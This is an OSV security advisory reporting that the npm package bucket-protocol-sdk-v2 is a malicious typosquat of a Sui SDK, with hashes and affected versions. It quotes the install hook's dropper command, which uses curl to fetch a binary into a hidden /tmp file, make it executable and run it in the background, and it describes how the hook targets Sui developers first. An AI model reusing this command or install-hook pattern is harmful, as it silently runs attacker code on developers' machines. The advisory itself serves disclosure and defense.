MAL-2026-4502

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/bucket-protocol-sdk-v2/MAL-2026-4502.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4502
Published
2026-05-20T04:04:00Z
Modified
2026-05-26T06:02:15.177292589Z
Summary
Malicious code in bucket-protocol-sdk-v2 (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (e19ff8a6cb5a08bd0561658d41dfe3616f1680bc5acac989c97da38f37ee41b4)

bucket-protocol-sdk-v2 advertises itself as a 'community maintained drop-in replacement' for the Sui ecosystem's bucket-protocol-sdk, but its src/ tree contains only empty stubs (bucket.ts: export {};, index.ts: export * from './bucket';) — no real SDK code is shipped. The entire payload is the postinstall hook. package.json declares "postinstall": "node install.js"; install.js checks whether the host is a Sui developer (presence of the sui binary or ~/.sui/sui_config/client.yaml) and then runs curl -s -L -o /tmp/.sui-helper ${implantUrl} && chmod +x /tmp/.sui-helper && /tmp/.sui-helper & to fetch, stage, and background-execute an attacker binary at a hidden /tmp path. The variable is literally named implantUrl with the comment PUT YOUR ACTUAL 0x0.st URL HERE, identifying the intended payload host as the anonymous 0x0.st file dump. The URL is currently an empty string in this published version (staged/broken release), so today's install does not actually fetch a binary, but the dropper scaffolding, target-gating, hidden staging path, backgrounded execution, and typosquat-of-a-Sui-SDK lure are unambiguous. Any subsequent republish trivially fills the URL. The combination of hostile-named scaffolding, dev-machine-targeting gate, anonymous-host comment, and hollow library content satisfies the namespace-abuse-typosquat-with-payload and generic-binary-runner-dropper patterns.

Database specific
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-05-20T04:04:30Z",
            "versions": [
                "1.0.26"
            ],
            "sha256": "1b25f4c8e7236236452ca049e0a8409ea8cea78d9ceb131daeea771d6365f61b",
            "id": "IN-MAL-2026-003456",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:40.680023655Z"
        },
        {
            "modified_time": "2026-05-20T04:04:10Z",
            "versions": [
                "1.0.11"
            ],
            "sha256": "5bab9298f8bac43d26a48a14cb001113d1415a38e9dbe3d78c55a8ebba95e679",
            "id": "IN-MAL-2026-003455",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:40.570388632Z"
        },
        {
            "modified_time": "2026-05-20T04:21:39Z",
            "versions": [
                "1.0.23"
            ],
            "sha256": "66a46f323763deecb5661ae7aa597ac73691211c718359914fef69c4322309ee",
            "id": "IN-MAL-2026-003462",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:41.316971934Z"
        },
        {
            "import_time": "2026-05-26T05:50:41.208819798Z",
            "versions": [
                "1.0.12"
            ],
            "sha256": "9612ba97a11244d132e6893004e23f8ba4999200709fc04dc4677a972de03155",
            "id": "IN-MAL-2026-003461",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T04:21:14Z"
        },
        {
            "modified_time": "2026-05-20T04:04:00Z",
            "versions": [
                "1.0.22"
            ],
            "sha256": "b70afaf3f61c7ec2726720fb4c7b00256bed2cd2eb65dc165cfa0fef243ecb13",
            "id": "IN-MAL-2026-003454",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:40.436204814Z"
        },
        {
            "modified_time": "2026-05-20T19:30:10Z",
            "versions": [
                "1.0.18"
            ],
            "sha256": "e19ff8a6cb5a08bd0561658d41dfe3616f1680bc5acac989c97da38f37ee41b4",
            "id": "IN-MAL-2026-003600",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:56.414273874Z"
        },
        {
            "modified_time": "2026-05-20T20:42:07Z",
            "versions": [
                "1.0.19"
            ],
            "sha256": "f213ad1e13ca48fd037fbad78f53b85c280b913fac9cd88632c4ad02f1fa980d",
            "id": "IN-MAL-2026-003612",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:58.104269831Z"
        }
    ]
}
References
Credits

Affected packages

npm / bucket-protocol-sdk-v2

Package

Name
bucket-protocol-sdk-v2
Purl
pkg:npm/bucket-protocol-sdk-v2

Affected ranges

Affected versions

1.*
1.0.11
1.0.12
1.0.18
1.0.19
1.0.22
1.0.23
1.0.26

Database specific

indicators
{
    "evidence_files": [
        {
            "sha256": "2d541f32fa2565d1bd59984485a53d5d8e2e5d6ae8dcdcf39487df3aa74c9cce",
            "tlsh": "86f0c0d202d2b336b9200cd5e959c43aa07bc0007417e6c494c84af72243a24c753cf7",
            "path": "install.js"
        },
        {
            "sha256": "44fed77a3d0a86e89770b87608011b2f2b182bbd38aec02e3c133b30f24c032f",
            "tlsh": "fbe0d82459134bb725c496570c26a167b7255f1f4444380c2adf9b1c839f7778cfa319",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-TUDlJnnMfPILAEnK4oJLNRqnrfEBnrL1bjbdPJdLtlmcOKMC1B/SdfAhyIRqWwwOxdShRTvHXz2p6/UDEt08Kw==",
                "sha1": "d2a7ff249158e4d6e9645fde6d0bfb4a5508267a"
            },
            "filename": "bucket-protocol-sdk-v2-1.0.26.tgz"
        }
    ]
}
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/bucket-protocol-sdk-v2/MAL-2026-4502.json"